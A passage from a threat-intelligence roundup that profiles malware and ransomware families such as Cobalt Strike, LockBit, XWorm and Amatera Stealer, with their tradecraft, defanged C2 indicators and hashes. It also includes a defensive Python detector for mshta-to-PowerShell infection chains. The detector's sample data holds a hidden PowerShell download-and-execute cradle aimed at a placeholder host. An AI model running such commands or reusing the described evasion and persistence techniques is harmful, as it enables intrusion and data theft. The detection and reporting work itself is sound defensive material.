applications associated with 1Password, Bitwarden, LastPass, MetaMask, Phantom, Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite. The malware includes a file-grabber component described as similar to functionality seen in Atomic macOS Stealer (AMOS). Reported file targets include extensions such as .docx, .wallet, .key, .json, and .rdp, with stolen data staged under /tmp/shub_<random>/ and in some reporting split into chunks before exfiltration. 
One report specifically identified uploads to hebsbsbzjsjshduxbs[.]xyz via /gate/chunk. Beyond theft, Reaper can tamper with desktop cryptocurrency wallet applications by downloading a modified app.asar from command-and-control, terminating the wallet process, and replacing the legitimate file to enable continued theft or monitoring. For persistence, Reaper creates files under a fake Google Software Update path at ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate and registers a LaunchAgent at ~/Library/LaunchAgents/com.google.keystone.agent.plist to mimic Google Keystone. The LaunchAgent executes every 60 seconds and beacons system details to a command-and-control /api/bot/heartbeat endpoint. If the server returns code, Reaper decodes it, writes it to a temporary hidden script such as /tmp/.c.sh, executes it with the current user’s privileges, and deletes it, providing a persistent remote code execution channel. Reported anti-analysis behavior includes overriding console functions, running debugger loops, and replacing page content with a Russian-language access-denied message if DevTools are opened. High-confidence indicators mentioned in the content include mlcrosoft[.]co[.]com, hebsbsbzjsjshduxbs[.]xyz, ~/Library/LaunchAgents/com.google.keystone.agent.plist, and ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate.

Mentions: 4
#13 Cobalt Strike
Ransomware

Cobalt Strike is a legitimate commercial penetration-testing framework that is extensively abused by threat actors, including ransomware operators and state-linked intrusion sets. The provided content repeatedly highlights its Beacon payload, which provides encrypted command-and-control communications for sending host information and receiving operator commands, and notes that Beacon is stealthy and easily customizable. Observed delivery methods in the content include PowerShell loaders used in scripted web delivery, JavaScript droppers, shellcode stagers, and retrieval of Beacon payloads disguised as images or web-associated file types such as CSS, JS, or SVG. One cited capability is use of Smart Applet attacks to disable the Java SecurityManager sandbox. Across the referenced reporting, Cobalt Strike appears primarily as a post-exploitation or third-stage payload. In FrostyNeighbor/Ghostwriter activity linked to Belarusian interests and targeting Ukrainian government organizations since at least March 2026, operators used spear-phishing emails with PDF lures impersonating Ukrtelecom, geofenced delivery infrastructure, and a JavaScript variant of PicassoLoader to profile victims before selectively deploying a third-stage Cobalt Strike Beacon to higher-value targets. In that campaign, reported Beacon artifacts included ViberPC.dll (SHA-1: 43E30BE82D82B24A6496F6943ECB6877E83F88AB) and EdgeSystemConfig.dll (SHA-1: 27FA11F6A1D653779974B6FB54DE4AF47F211232), both identified as Win32/CobaltStrike.Beacon.S. Associated C2 infrastructure in the same reporting included nama-belakang.nebao[.]icu, best-seller.lavanille[.]buzz, and the final Beacon URL https://nama-belakang.nebao[.]icu/statistics/discover.txt. The content also associates Cobalt Strike with multiple ransomware and intrusion ecosystems. The Gentlemen ransomware operation is reported to use Cobalt Strike alongside SystemBC, AnyDesk, PowerShell, PsExec, WMI, WinSCP, Nmap, and other tooling. 
Karakurt intrusions reportedly used Cobalt Strike together with AnyDesk, Mimikatz, PowerShell, Rclone, FileZilla, and Mega.io after initial access via stolen VPN credentials. Microsoft reported Storm-1811 using Quick Assist and Microsoft Teams-based social engineering to deliver Qakbot, which in turn delivered a Cobalt Strike Beacon, with listed Beacon C2 domains zziveastnews[.]com and realsepnews[.]com. Tropic Trooper infrastructure was reported to host Cobalt Strike Beacon alongside the custom backdoor EntryShell. MirrorFace has also used Cobalt Strike among its toolset. The content further places Cobalt Strike in broader operational contexts: Sandworm-related telemetry included environments with pre-existing Cobalt Strike command-and-control activity; Nozomi specifically recommends treating Cobalt Strike detections as serious strategic warnings. Splunk published detections for a characteristic Cobalt Strike PowerShell loader decompression pattern and for command obfuscation techniques observed in malware including Cobalt Strike. Additional infrastructure references in the content include a historic Cobalt Strike C2 at furfen[.]com, a known C2 IP in Hong Kong at 83.229.126[.]195, and another known C2 server at 118.25.10.65:8088 with beaconing to port 65011. The content also notes that some shellcode overlaps attributed to Cobalt Strike can be false positives because common tradecraft such as PEB walking, API hashing, and position-independent code is shared with other malware.

Mentions: 4
#14 Stuxnet

Stuxnet is malware widely regarded in the provided content as the first known cyber weapon used in a geopolitical context and the opening chapter of state-sponsored cyber sabotage. The content states that it targeted Iran’s nuclear program, specifically uranium enrichment centrifuges at the Natanz facility. It spread automatically from system to system and included an automated propagation component. Its sabotage functionality analyzed PLC logic in Iranian uranium enrichment facilities and injected malicious ladder logic into Siemens PLC-controlled processes to alter centrifuge behavior, with the effect of destroying or disrupting centrifuges while avoiding obvious destruction and preserving plausible deniability. The content repeatedly frames Stuxnet as a precision sabotage tool for tightly controlled or air-gapped environments and as a conceptual predecessor to later sabotage frameworks such as fast16. The material also references an earlier variant, Stuxnet 0.5, with development discussed as early as 2005 and use against Iran’s nuclear program in 2007, while the broader operation became publicly associated with 2010. Aliases present in the content include W32.Stuxnet and w32stuxnet.

Mentions: 4
#15 GodZilla

Godzilla is a web shell, including JSP and ASPX/ASHX variants, used to establish persistent remote access and execute commands on compromised web-facing systems. The content describes it as a Chinese-language web shell and notes in-memory loading in some exploit chains. It has been deployed after exploitation of vulnerable Microsoft Exchange and IIS servers, including ProxyLogon-related intrusions, and has also been observed on Cisco Catalyst SD-WAN Manager/Controller compromises where public proof-of-concept exploit code was used to drop web shells. Reported filenames include "20251117022131.jsp" and "vmurnp_ikp.jsp". Godzilla is repeatedly associated with China-aligned or Chinese threat activity, including SHADOW-EARTH-053, where operators exploited Exchange and IIS vulnerabilities, placed Godzilla in Exchange and IIS directories for persistence, and then staged ShadowPad via DLL sideloading. It is also described as commonly used by Shadow-Earth-053 and other China-based crews. Palo Alto Networks Unit 42 reported CL-UNK-1068 using Godzilla and ANTSWORD web shells on misconfigured web servers to enable lateral movement and theft of browser history, XLSX/CSV files, IIS/web application files, and database backups across Windows and Linux environments, with activity assessed as likely espionage-focused. Cisco Talos reporting on SD-WAN exploitation linked multiple post-compromise clusters to Godzilla deployments alongside Behinder, XenShell, AdaptixC2, Sliver, XMRig, KScan/QScan, Nim-based backdoors, gsocket, and credential stealers targeting admin hashes, JWT key chunks, and AWS credentials. Additional reporting cited Godzilla among web shells used by TGR-STA-1030/UNC6619 in global espionage intrusions against government and critical infrastructure organizations. 
High-confidence indicators directly mentioned in the content include the web shell filenames "20251117022131.jsp" and "vmurnp_ikp.jsp" and cluster-associated IPs 38.181.52[.]89, 89.125.244[.]33, 89.125.244[.]51, 38.60.214[.]92, 65.20.67[.]134, 104.233.156[.]1, and 194.233.100[.]40.

Mentions: 4
#16 Hydraq

Hydraq, also known as 9002 RAT, McRat, Homeunix/Homux, Hidraq, Aurora, and Roarur, is a Windows backdoor/RAT family. The content explicitly identifies 9002 RAT as Hydraq/McRat and notes related naming overlaps including HOMEUNIX. Hydraq establishes persistence by using svchost.exe to execute a malicious DLL in a new service group and by creating a Registry subkey to register the created service; it can later uninstall itself by deleting that value. Its backdoor capabilities include deleting files, loading and calling DLL functions, monitoring services, clearing all system event logs, retrieving system information such as CPU speed from Registry keys, and modifying or deleting Registry subkeys. Hydraq also includes a VNC-based component capable of streaming a live feed of the infected host’s desktop. Its command-and-control traffic is encrypted/obfuscated using bitwise NOT and XOR operations. The malware has been associated in the provided content with China-aligned espionage activity: Webworm previously used McRat/9002 RAT before shifting to newer tooling, and separate reporting cited APT17 activity against Italy using 9002 RAT. The content does not provide a confirmed initial infection vector or specific IOCs for Hydraq itself.

Mentions: 3
#17 LockBit
Ransomware

LockBit is a mature ransomware-as-a-service (RaaS) operation with a large affiliate network that has been active since 2019 and was initially known as ABCD. It uses a double-extortion model, encrypting victim data and exfiltrating files to attacker-controlled servers. The malware family has evolved through multiple versions including LockBit 2.0, LockBit 3.0 (also known as LockBit Black), LockBit 4.0, and LockBit 5.0. LockBit 5.0 was launched in September 2025 and supports Windows, Linux, and ESXi, with reporting indicating a primary focus on the U.S. business sector. In Q1 2026, LockBit posted 163 victims and ranked fourth globally after re-emerging following the early-2024 Operation Cronos disruption. LockBit targets organizations across multiple sectors. Reported victim sectors include private business broadly, as well as medical, financial, manufacturing, government, and education. The content also notes continued targeting of healthcare organizations in 2026, including via third-party compromise and supply-chain access. Foxconn has been repeatedly cited as a victim, with LockBit claiming attacks against a Foxconn production plant in Tijuana, Mexico in 2022 and Foxconn subsidiary Foxsemicon in January 2024. Capabilities described in the content include cross-platform encryption using XChaCha20 for symmetric encryption and Curve25519 for asymmetric encryption in LockBit 5.0, randomized 16-character encrypted-file extensions, and a shared ransom note format across variants. The Windows variant includes advanced packing, anti-analysis, and defense-evasion behavior such as process hollowing into defrag.exe, DLL unhooking, ETW patching, event log clearing, self-deletion, anti-debugging, and checks for Russian language or geographic indicators. LockBit 2.0 can disable firewall rules and anti-malware and monitoring software including Windows Defender. Linux and ESXi variants are obfuscated and terminate when analysis tools such as strace, ltrace, or rr are detected. 
The ESXi variant targets /vmfs/ paths, can terminate virtual machines to unlock files, and is advertised as supporting Proxmox. Observed infection and deployment vectors in the content include exploitation of vulnerable internet-facing enterprise software and abuse of remote management infrastructure. LockBit payloads were linked to exploitation of PaperCut NG/MF vulnerability CVE-2023-27351, including activity attributed in April 2023 to Lace Tempest. Huntress also documented incidents in 2026 where attackers exploited Bomgar Remote Support / BeyondTrust Privileged Remote Access vulnerability CVE-2026-1731 and then deployed LockBit ransomware, likely using the leaked LockBit 3.0 builder. In those incidents, attackers used compromised or rogue Bomgar instances, created privileged accounts, added users to Local Administrators and Domain Admins, and deployed tools such as AnyDesk, Atera, ScreenConnect, and SimpleHelp for persistence and lateral movement. The content specifically notes suspected use of the previously leaked LockBit 3.0 builder in multiple 2026 incidents. Associated behaviors included reconnaissance, privilege escalation, pushing access tools directly to domain controllers, and use of suspicious tooling such as HRSword.exe and PoisonX.sys in apparent attempts to disable security tooling. One observed sample name was LB3.exe, with reported SHA-256 hashes 538b3b36dd8a30e721cc8dc579098e984cf8ed30b71d55303db45c7344f7a4cf and 3529b1422da886b7d04555340dfb1efd44a625c2921af6df39819397176956d6. Related observed email contact in ransom notes was lokbt9@onionmail[.]org. Additional infrastructure-related reporting in the content states that a public IP address and domain hosting LockBit sites were exposed in December 2025, and that the exposed IP had previously been used in SmokeLoader activity in 2022 and was linked to rodericwalter[.]com, suggesting possible infrastructure reuse or rental. 
At the time of one analysis, the LockBit leak site contained 60 victim entries, with the first listed on December 4, 2025. Overall, the content characterizes LockBit as one of the most prolific ransomware families, with broad affiliate-driven targeting, strong Windows/Linux/ESXi support, extensive defense evasion, and repeated use in intrusions involving enterprise software exploitation and compromised remote management platforms.

Mentions: 3
#18 INC Ransomware
Ransomware

INC Ransomware, also referred to as INC Ransom or Incransom, is a ransomware operation that emerged in mid-2023 and is described in the content as operating in a ransomware-as-a-service model. It conducts double extortion, stealing data and encrypting victim systems to pressure payment for decryption and non-disclosure. Reported targeting includes healthcare and professional services, with activity initially focused on the United States and United Kingdom before expanding into Australia in mid-2024 and later into New Zealand and Tonga. The content also notes incidents affecting healthcare providers and industrial entities, and cites the group among the highest-volume ransomware threats in FBI complaint data for 2025. Observed initial access methods include phishing, use of compromised valid accounts including RDP access, purchase of access from initial access brokers, and exploitation of public-facing applications, specifically including CVE-2023-3519 in Citrix NetScaler. Post-compromise behavior includes scanning for domain administrator accounts, enumerating domain groups, network shares, and services, testing connectivity over RDP, and using tools such as Advanced IP Scanner, NETSCAN.EXE, Internet Explorer for share discovery, PsExec, WMIC, AnyDesk, and PuTTY. The group has used 7-Zip and WinRAR to archive data, staged data on compromised hosts, and exfiltrated data with MegaSync to cloud storage. Defense evasion noted in the content includes disabling Windows Defender via SystemSettingsAdminFlows.exe, renaming PsExec to winupd, uninstalling tools after use, and using Mimikatz to steal passwords. 
Huntress also documented February 2026 activity in which an actor deployed INC ransomware after using PsExec for privilege escalation, creating a scheduled task named "Recovery Diagnostics," using a renamed copy of Restic for staging data to a Wasabi S3 repository, uninstalling VIPRE Business Agent, disabling Microsoft Defender real-time protection, and launching the ransomware from c:\perflogs\win.exe with arguments "--sup --hide --mode medium." In that case, INC-README.txt ransom notes were created. Huntress provided SHA256 hashes 1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d for C:\123\edr.exe and e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13 for c:\perflogs\win.exe. The content links INC affiliates to broader cybercrime infrastructure and ecosystems. Microsoft tied ransomware affiliates responsible for delivering INC, Qilin, and Akira to the Fox Tempest malware-signing-as-a-service operation, which abused Microsoft Artifact Signing to issue short-lived certificates used to sign malware. Additional reporting cited in the content states that INC Ransom and Sinobi share 55.9% function similarity, and another source notes Lynx shares 48% of its source code with earlier INC ransomware. The content also mentions possible association of some deployments with actors previously linked to INC ransomware, also referred to in one mention as Warble. High-confidence victim reporting in the content includes a May 2025 healthcare breach in New Zealand involving data theft and encryption, a June 15, 2025 attack on Tonga’s Ministry of Health that disrupted information and communications networks and core national services, and an underground-forum claim observed by CYFIRMA that JA Akita Kita Life Service, K.K in Japan was compromised, with approximately 43.1 GB of data allegedly stolen.

Mentions: 3
#19 EchoCreep

EchoCreep is a Go-based backdoor used by the China-aligned APT group Webworm, which is also tracked as Space Pirates and UAT-8302. ESET reported that Webworm introduced EchoCreep in 2025 as part of campaigns targeting government organizations in Belgium, Italy, Poland, Serbia, and Spain, as well as activity involving a university in South Africa, amid the group’s broader expansion from Asia into Europe. EchoCreep uses Discord for command-and-control communications via crafted HTTP requests to Discord APIs. Reported capabilities include uploading files, sending runtime reports, receiving commands, downloading files, and executing commands through cmd.exe. ESET decrypted 433 Discord messages associated with EchoCreep and identified four unique Discord channels corresponding to different victims; recovered logs indicated the first actual EchoCreep compromise occurred on April 9, 2025, while Discord channel activity dated back to March 21, 2024. EchoCreep decodes commands with base64 and decrypts them using AES-CBC-128. The delivery mechanism and initial access vector for EchoCreep are currently unknown. ESET attributed the activity to Webworm through decrypted Discord messages, infrastructure overlaps, and an attacker-operated GitHub repository used to stage malware and supporting tools.

Mentions: 3
#20 XWorm
Ransomware

XWorm is a modern .NET remote access trojan (RAT), sometimes described as having worm capabilities, that is widely used in commodity malware campaigns and Malware-as-a-Service activity. The provided content references variants including XWorm V3.1, V6.0, V6.4, and V7.4, as well as an XClient variant and an XWorm/njRAT hybrid. Reported capabilities across the cited campaigns include full remote control, password and credential theft, keylogging, screen capture, webcam activation, file access and transfer, process injection, plugin-based extensibility, clipboard monitoring, USB spreading, hosts file manipulation for DNS hijacking, DDoS attacks, and in some cases file encryption or ransomware-capable behavior. One variant also used Telegram-based C2 notifications, and another implemented a BSoD kill switch via RtlSetProcessIsCritical. Observed delivery and execution chains are varied but consistently multi-stage and evasive. XWorm was delivered via phishing emails, fake invoices, fake software updates, steganography-hidden payloads in image files, VBScript droppers, JavaScript and HTA/MSHTA chains, BAT/WSH/WSF staging, PyInstaller-packaged loaders, Go-based loaders, and Python-based loaders that bundled full Python runtimes. Several campaigns used Donut shellcode, AMSI and WLDP bypasses, RC4 or AES-based payload protection, Early Bird APC injection, process hollowing, or shellcode injection into legitimate processes such as explorer.exe, notepad.exe, caspol.exe, and Msbuild.exe. In one PyInstaller campaign, XWorm V7.4 hid itself as %LOCALAPPDATA%\Win.Kernel_Svc_AJ8iOw.exe and connected to 68.219.64.89:4444 using an AES secret key. Another campaign delivered XWorm shellcode via info.py, while a separate Go/ScrubCrypt chain delivered XWorm v6.4 configured for 204.10.160.190:7003 with mutex Cqu1F0NxohroKG5U and install name USB.exe. The malware appears in multiple active 2025-2026 campaigns and clusters. 
The content directly associates XWorm with SERPENTINE#CLOUD operations, including German-language fake DATEV invoice lures and UK-themed Cloudflare Tunnel/WebDAV delivery chains. It is also referenced in Amadey pay-per-install activity, steganography-based phishing tracked by Cofense, PyInstaller abuse documented by Point Wild, and campaigns using LocaltoNet tunnels, DuckDNS, No-IP DDNS, and residential or VPS-hosted infrastructure. One report describes a compromised XWorm MaaS panel hosted at 84.201.14.2 that tracked 1,893 victims and multiple operator accounts. Another campaign was linked to a Turkish-origin actor using the GitHub alias flexhere687-art. The malware has been observed targeting multiple sectors, with lures themed around invoices, finance, logistics, government, and software downloads. High-confidence infrastructure and indicators mentioned in the content include C2 endpoints such as 68.219.64.89:4444, 204.10.160.190:7003, 178.16.55.160:2323, 43.157.1.71:2323, 85.137.253.58:9000 and :9090, hy647dhon.duckdns.org:8292, laohe1.myvnc.com, alzap.ddns.com.br, mzsgu2rhxn.localto.net:3480, windowsupdateservice.localto.net, and c.ultaicloud.com:10013. Additional filenames and artifacts directly tied to XWorm in the content include Win.Kernel_Svc_AJ8iOw.exe, afacan313131.exe, Token GrabberV2.exe, XClient.exe, taskhostw.exe, and mutexes such as lOyuApQB7sBGSt3o and Cqu1F0NxohroKG5U.

Mentions: 3
#21 Amatera Stealer

Amatera Stealer is a commodity information-stealing malware family and Malware-as-a-Service offering, also referred to as Amatera, and described in the provided reporting as a rebranded version of ACR (AcridRain) Stealer. It has been linked to the threat actor SheldIO and is positioned in reporting as a successor or replacement to Lumma Stealer. The malware has been observed in multiple 2026 delivery campaigns targeting Windows and, in some reporting, broader cross-platform developer-focused lures tied to fake software installation pages. Observed delivery vectors include ClickFix and InstallFix-style social engineering, fake CAPTCHA or human-verification prompts, Google Ads malvertising, cloned Claude Code installation pages, phishing, fake software downloads, cracked software lures, Discord-delivered verification pages, and multi-stage loader chains involving MSHTA. Reporting also describes delivery through CountLoader, Emmenhtal Loader, and abuse of the signed Microsoft App-V script SyncAppvPublishingServer.vbs. In Windows-focused chains, victims are tricked into copying and executing malicious commands via the Run dialog or terminal-like install instructions, after which mshta.exe, PowerShell, HTA/VBScript, or in-memory shellcode loaders are used to retrieve and execute Amatera. Capabilities directly described in the content include theft of browser-stored credentials, cookies, session tokens, browser data, crypto-wallet information, wallet browser extensions, desktop cryptocurrency wallets, Discord data, Signal data, password manager files, system information, and files from user directories including Downloads. One report states the malware expanded harvesting to 65 browser targets, 165 wallet browser extensions, and 137 desktop wallet targets, and that its file grabber searches for wallet exports, seed phrases, private keys, passwords, JSON, TXT, PDF, KDBX, and wallet-related files. 
Additional reporting states it targets information from the user folder and victim data similar to that collected by LummaStealer. Behavior and technical characteristics described in the content include in-memory execution via reflective loaders and shellcode, string encryption using XTEA, syscall resolution and hook evasion using RecycledGate/FreshyCalls-style techniques, anti-debugging, anti-analysis checks, and geofencing behavior that exits on Ukrainian keyboard layouts or when certain Kaspersky driver files are detected. One eSentire report states the malware changed C2 protection from AES-256-CBC with a hard-coded key to ECDH over NIST P-256 followed by ChaCha20-Poly1305, initiates C2 with HTTP POST requests to the root path, and uses the X-Request-ID header during session establishment. Other reporting states Amatera communications may be routed through legitimate CDN infrastructure, and one campaign used Cloudflare-fronted infrastructure with payload gating based on a curl/ User-Agent substring. Associated targeting in the provided content includes a finance-industry customer environment observed by eSentire, enterprise-managed Windows environments implied by App-V-dependent delivery, and developers or users searching for AI tooling such as Anthropic Claude Code. The broader lure ecosystem includes AI tool impersonation and shadow-AI usage scenarios. High-confidence indicators mentioned in the content include the remote server 144.124.235.102; initial dropper URL hxxps://download.version-516[.]com/other; second-stage domain oakenfjrod.ru; C2 indicators 77.91.97.244 and compactedtightness.cfd; Windows infection URL hxxps://claude[.]update-version[.]com/claude; campaign infrastructure contatoplus[.]com; and PNG/payload delivery domains such as gcdnb.pbrd[.]co and iili[.]io.
Sample hashes explicitly provided include shellcode loader SHA-256 e913fa5b2dd0a7fc3dbaf0a6f882b3ead9a58511bd945b6e5c478cbd2b900508 and unpacked Amatera sample SHA-256 ec1206989449d30746b5ceb2b297cda9f3f09636a0e122ecafb40b1dc2e86772.

Mentions: 3
#22 Emmenhtal Loader

Emmenhtal Loader is a multi-stage malware loader used to deliver commodity malware, particularly information stealers such as Lumma Stealer. Bitdefender reported it as part of active MSHTA-based infection chains observed in 2026. The loader is associated with ClickFix-style social engineering, including fake human-verification and reCAPTCHA/CAPTCHA pages, as well as phishing messages on Discord. In the observed chain, victims were tricked into pressing Win+R, pasting a clipboard-copied command, and executing mshta.exe against a remote HTA payload. The HTA payload executed directly in memory and was described as intentionally bloated with garbage data to hinder analysis. A later stage launched PowerShell to download and execute a remote script in memory without writing it to disk, and the PowerShell stage included an AMSI bypass by patching clr.dll before decoding and loading a .NET assembly in memory. In the analyzed case, the final payload was LummaStealer. The malware targets Windows systems through abuse of built-in Microsoft utilities such as mshta.exe. Reported indicators include SHA256 hashes AA845A8FB4AB38AEBE6A16A2A8F80CA4467AC0991D3EEF4D8A10BDF97DEDB1E9, 02630FA994B1566AD1515FD87220FC037B967F07495985A3637D68D7E08C57EE, and 1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84. Related reporting also states that ClearFake used ClickFix and CAPTCHA challenges to deliver Emmenhtal Loader, also referred to as PEAKLIGHT, which then dropped Lumma Stealer.
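Defender-side detection logic for the chain just described, as an added example that is not part of the original page or of any vendor's tooling: it walks constructed process-creation events (Sysmon-style image, command line and parent links; every pid, path and URL below is made up) and flags mshta.exe fetching a remote HTA together with a PowerShell download cradle that mshta.exe spawned. That a Run-dialog launch appears as a child of explorer.exe is an assumption noted in the code.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample events (not from any real host). pid/ppid links model the
# Win+R -> mshta.exe -> PowerShell chain; two benign events are included as controls.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 1000, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://verify.example.invalid/check.hta"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://cdn.example.invalid/s.ps1')\""),
    ProcEvent(1400, 1000, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Program Files\Vendor\local.hta"),      # local HTA: benign control
    ProcEvent(1500, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\inventory.ps1"),    # admin script: benign control
]

# mshta.exe given an http(s) URL as its HTA source
REMOTE_HTA = re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://", re.IGNORECASE)
# common in-memory download-and-execute patterns in a PowerShell command line
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|\bIEX\b|Invoke-Expression|-enc\w*\s",
                             re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_mshta_chains(events):
    """Return (stage, pid, reason) tuples for each suspicious stage found."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""
        if name == "mshta.exe" and REMOTE_HTA.search(e.cmdline):
            reason = "mshta.exe fetching a remote HTA"
            if parent_name == "explorer.exe":   # assumption: Run dialog children sit under explorer.exe
                reason += " from explorer.exe (consistent with Win+R)"
            findings.append(("stage1_remote_hta", e.pid, reason))
        elif name == "powershell.exe" and parent_name == "mshta.exe" and DOWNLOAD_CRADLE.search(e.cmdline):
            findings.append(("stage2_inmemory_ps", e.pid, f"download cradle spawned by mshta.exe pid {parent.pid}"))
    return findings
```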

Mentions: 3
#23 BlackCat
Ransomware

BlackCat, also known as ALPHV and Noberus, is a ransomware-as-a-service (RaaS) malware family and operation that emerged in late 2021. The malware is written in Rust and is designed to operate across multiple operating systems, including Windows and Linux. Under the RaaS model described in the content, core operators maintained the malware code, updated capabilities, and managed negotiation portals and data leak sites, while affiliates conducted intrusions and deployed the ransomware. Revenue sharing cited in the content allocated 20% of ransom payments to the operators and 80% to affiliates. The content states that BlackCat/ALPHV spread through stolen credentials, phishing emails, and exposed Remote Desktop Protocol services. After access was obtained, affiliates moved laterally within victim networks, disabled security tools, encrypted critical files, and demanded payment in cryptocurrency. The operation also used extortion infrastructure and leak sites, and the content notes incidents in which stolen or leaked data, including patient data from a doctor’s office, was used to pressure victims. BlackCat/ALPHV is associated with high-impact extortion campaigns and is described in the content as having targeted more than 1,000 victims worldwide, including U.S. businesses in medical, engineering, pharmaceutical, drone manufacturing, and healthcare-related sectors. The content also notes that ALPHV/BlackCat activity and tooling influenced later ransomware ecosystems and that the Nitrogen operation initially used a loader that deployed BlackCat/ALPHV payloads before later developing its own ransomware. Additional reporting in the content references BlackCat’s use by affiliates and mentions its role in attacks against multiple U.S. companies during 2023. 
Threat actor associations directly mentioned in the content include affiliates Ryan Goldberg, Kevin Martin, and Angelo Martino, who admitted or were convicted in connection with deploying ALPHV BlackCat against multiple U.S. victims in 2023. The content also references FBI reporting that Iranian actors partnered with affiliates of the AlphV ransomware operation and took a percentage of ransom payments. Another cited segment characterizes BlackCat/ALPHV as the ransomware component in an alleged intrusion chain involving Scattered Spider, though that claim is presented as commentary rather than law-enforcement attribution. Operationally relevant details in the content include that the FBI disrupted ALPHV BlackCat in December 2023 by developing and distributing a decryption tool to victims and seizing several BlackCat-operated websites, actions that reportedly saved victims approximately $99 million in ransom payments. The content further notes that BlackCat as an entity has largely disappeared, but its tooling, affiliate ecosystem, and influence continued to be referenced in 2026 reporting. High-confidence aliases from the content are ALPHV, ALPHV_BlackCat, BlackCat, and Noberus.

Mentions: 3
#24 The Gentlemen
Ransomware

The Gentlemen is a ransomware-as-a-service (RaaS) operation that emerged publicly around mid-to-late 2025 and rapidly became one of the most active ransomware threats by early 2026. It is described as a double-extortion operation that steals data before encrypting systems and threatens publication on its leak site if victims do not pay. Reporting in the provided content links the operation to a Russian-speaking administrator using the aliases zeta88 and hastalamuerte, and assesses it as connected to or a continuation of prior affiliate activity associated with the Qilin ecosystem. The malware supports multiple enterprise platforms. The Windows locker is written in Go and requires a password argument at execution, a behavior noted as helping evade early detection and sandbox analysis. The broader locker portfolio includes variants for Linux, NAS, BSD, and VMware ESXi; one report states the ESXi locker is written in C. The ransomware uses XChaCha20 and X25519 for encryption, with reports also describing hybrid encryption and partial encryption of large files to accelerate impact. Encrypted files may receive random six-character extensions, with examples including .7mtzhh and .ojuopo. The malware drops a ransom note named README-GENTLEMEN.txt or READMEGENTLEMEN.txt and is associated with the wallpaper/artifact gentlemen.bmp. A publicly described decryptor recovers X25519 ephemeral keys from process memory dumps. Observed behavior includes stopping services and processes related to databases, backups, virtualization platforms, remote access tools, and enterprise applications before encryption; deleting shadow copies; clearing event and RDP logs; disabling or tampering with Microsoft Defender and firewall protections; adding exclusions; and, in some reporting, enabling SMB1, loosening LSA anonymous access, wiping free space, and removing forensic artifacts. 
The Windows variant supports built-in spreading and domain-wide deployment, including use of harvested credentials, WMI/WMIC, SCHTASKS, SC, PowerShell Remoting, and Group Policy Objects. Reporting also notes self-restart, run-on-boot capability, and a Windows silent mode that encrypts without renaming files while preserving timestamps. The ESXi variant is described as shutting down virtual machines, disabling automatic VM recovery, and using persistence paths such as /bin/.vmware-authd, rc.local, and cron. Initial access and post-exploitation tradecraft in the provided content include abuse of exposed remote services and compromised credentials, especially Fortinet FortiGate VPN appliances and Cisco edge devices; brute forcing; exploitation of known vulnerabilities; purchased access from brokers; and use of stealer-derived credentials. Specific vulnerabilities tracked by the operators reportedly included CVE-2024-55591, CVE-2025-32433, and CVE-2025-33073. Affiliates conduct Active Directory reconnaissance, privilege escalation, credential harvesting, Kerberoasting, lateral movement, and mass deployment. The operation has been associated with tools and malware including SystemBC, Cobalt Strike, AnyDesk, Advanced IP Scanner, Nmap, WinSCP, PsExec, WMI, PowerShell, NetExec, Mimikatz, RelayKing, Velociraptor, PrivHound, CertiHound, PowerRun, KillAV, and multiple EDR-evasion utilities. Reported C2 infrastructure associated with activity includes 91.107.247.163 and 45.86.230.112. The operation targets enterprise and infrastructure organizations globally. Victim reporting in the content spans roughly 70 countries, with strong activity across APAC, Europe, Latin America, and North America. Sectors explicitly cited include professional services, manufacturing, technology, healthcare, construction, insurance, financial services, IT, government, and education. 
Multiple reports characterize The Gentlemen as especially significant for healthcare and other critical infrastructure-adjacent organizations. Public victim counts in the content vary by source and time period, including 166 victims in Q1 2026, around 332-352 claimed victims in the first months of 2026, and telemetry tied to SystemBC suggesting activity across more than 1,570 enterprise environments, indicating public leak-site counts likely understate total compromises. The operation uses an affiliate model with reporting that affiliates receive 90% of ransom proceeds. Its infrastructure includes an affiliate panel supporting payload generation, victim and negotiation management, ransom estimation, stolen-data uploads, and decryptor management. Negotiations are reported to occur via Tox or Session identifiers, and the ransom note references the onion leak site tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion. High-confidence indicators mentioned in the content include the ransom note filenames README-GENTLEMEN.txt and READMEGENTLEMEN.txt, the wallpaper/artifact gentlemen.bmp, the onion site above, the TOX ID F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E, and sample SHA-256 51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2 for a Windows sample.

Mentions: 3